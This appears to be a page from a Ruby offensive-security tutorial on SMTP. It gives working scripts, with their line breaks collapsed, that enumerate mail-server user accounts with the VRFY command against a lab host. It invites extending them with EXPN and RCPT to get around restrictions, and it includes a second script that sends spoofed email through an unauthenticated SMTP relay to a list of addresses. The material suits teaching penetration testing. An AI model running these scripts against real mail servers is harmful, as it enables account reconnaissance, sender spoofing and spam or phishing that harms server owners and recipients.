Interacting with SMTP is easy and since the protocol is straight forward. We can use the VRFY command to check if an email address exists or not:
#!/usr/bin/env ruby# KING SABRI | @KINGSABRI#require 'socket'​users =%w{root rubyfu www apache2 bin daemon sshdgdm nobody ftp operator postgres mysqld}found = []​@s = TCPSocket.new('192.168.0.19', 25)@banner = @s.recv(1024).chompusers.each do |user|@s.send "VRFY #{user} \n\r", 0resp = @s.recv(1024).chompfound << user if resp.split[2] == userend@s.close​puts "[*] Result:-"puts "[+] Banner: " + @bannerputs "[+] Found users: \n#{found.join("\n")}"
Results
[*] Result:-[+] Banner: 220 VulnApps.localdomain ESMTP Postfix[+] Found users:rootrubyfuwwwbindaemonsshdgdmnobodyftpoperatorpostgres
Your turn, there are other commands that can be used such as EXPN, RCPT
. Enhance the above script to include all these commands to avoid restricted commands that might you face. More SMTP commands are listed here.
SMTP not protected by authentication can be abused to send emails from anyone:
#!/usr/bin/env ruby​require 'socket'​users = File.read('emails.txt').split("\n")​@s = TCPSocket.new('example.org', 25)@banner = @s.recv(1024).chompusers.each do |user|@s.send "MAIL from:noraj@example.org \n\r", 0@s.send "RCPT to:#{user} \n\r", 0@s.send "DATA \n\r", 0@s.send "email body here \r\n.\r\n", 0resp = @s.recv(1024).chompputs respend@s.close​puts "[*] Result:-"puts "[+] Banner: " + @banner